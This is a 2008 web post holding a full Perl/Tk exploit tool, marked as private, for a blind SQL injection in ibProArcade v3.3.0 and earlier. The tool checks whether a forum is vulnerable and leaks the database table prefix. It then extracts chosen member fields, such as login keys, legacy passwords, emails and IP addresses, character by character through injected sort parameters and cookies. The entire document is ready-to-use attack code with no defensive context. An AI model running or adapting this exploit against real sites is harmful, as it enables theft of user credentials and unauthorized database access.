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Posted on 31 January 2008

#!/usr/bin/perl ## ibProArcade <= v3.3.0 sql injection exploit ## (c)oded by 1dt.w0lf ## RST/GHC ## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE ## KEEP IT PRIVATE use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; BEGIN { if($^O eq 'MSWin32'){ require Win32::Console; Win32::Console::Free(); } } $mw = new MainWindow(title => "r57ibProArcade" ); $mw->geometry ( '420x310' ) ; $mw->resizable(0,0); $mw->Label(-text => '!', -font => '{Webdings} 22')->pack(); $mw->Label(-text => 'ibProArcade sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $mw->Label(-text => '')->pack(); $fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ; $fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ; $url = ''; $user_id = '1'; $prefix = 'ibf_'; $column = 'member_login_key'; $report = ''; $true = 0; $false = 0; $fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $url) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $user_id) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $prefix) ->pack ( -side => "top" , -anchor => 'w' ) ; $fright->Label( -text => ' ')->pack(); $fleft->Label( -text => ' ')->pack(); $fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Label( -text => ' ')->pack(); $fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $b = $fright->BrowseEntry( -relief => "groove", -variable => $column, -font => '{Verdana} 8'); $b->insert("end", "member_login_key"); $b->insert("end", "name"); $b->insert("end", "ip_address"); $b->insert("end", "legacy_password"); $b->insert("end", "email"); $b->pack( -side => "top" , -anchor => 'w' ); $fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $report) ->pack ( -side => "top" , -anchor => 'w' ) ; $fright->Label( -text => ' ')->pack(); $fright->Button(-text => 'Test forum vulnerability', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &test_vuln )->pack(); $fright->Button(-text => 'Get database tables prefix', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &get_prefix )->pack(); $fright->Button(-text => 'Get data from database', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &get_data )->pack(); $fleft->Label( -text => ' ')->pack(); $fleft->Label( -text => '+++ PRIV8 +++', -font => '{Verdana} 7')->pack(); $fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack(); $fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack(); MainLoop(); sub get_data() { $true = &get_true(); $report = ''; $s_num=1; while(($chr = &found(0,255))!=0){ $report .= chr($chr); $mw->update(); $s_num++; } if(length($report) > 0) { &report('That's all ;)'); } else { &report('Can't get data from database'); } } sub test_vuln() { $InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]); $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $true = &get_true(); $false = &get_false(); if($true != $false) { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; } $InfoWindow->Show(); $InfoWindow->destroy; } sub get_true() { $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=,(-gid*(1=1))"); if($res->as_string =~ /g=(d+)" target="hiddenframe"><img src="./arcade/images/addfav.gif"/) { $rep = $1; } return $rep; } sub get_false() { $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=,(-gid*(1=2))"); if($res->as_string =~ /g=(d+)" target="hiddenframe"><img src="./arcade/images/addfav.gif"/) { $rep = $1; } return $rep; } sub get_prefix() { $InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]); $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=r57r0x"); if($res->is_success) { $rep = ''; if($res->as_string =~ /from (.*)games_list/) { $prefix = $1; $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack; } else { $InfoWindow->add('Label', -text => 'Can't get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } } else { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; } $InfoWindow->Show(); $InfoWindow->destroy; } sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } $r = int($fmax - ($fmax-$fmin)/2); $check = " BETWEEN $r AND $fmax"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r); } } sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } $i = 0; return $i; } sub check($) { $n++; $rep = ''; $ccheck = $_[0]; $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url.'?autocom=arcade',cookie=>'g_display_sort=added;g_display_order=,(-gid*(SELECT 1 FROM '.$prefix.'members WHERE (id='.$user_id.' AND ascii(substring('.$column.','.$s_num.',1))'.$ccheck.') LIMIT 1)) LIMIT 1'); if($res->as_string =~ /g=(d+)" target="hiddenframe"><img src="./arcade/images/addfav.gif"/) { $rep = $1; } if($rep == $true) { return 1; } else { return 0; } } sub report() { $InfoWindow=$mw->DialogBox(-title => 'Report', -buttons => ["OK"]); $InfoWindow->add('Label', -text => $_[0], -font => '{Verdana} 7')->pack; $InfoWindow->Show(); $InfoWindow->destroy; }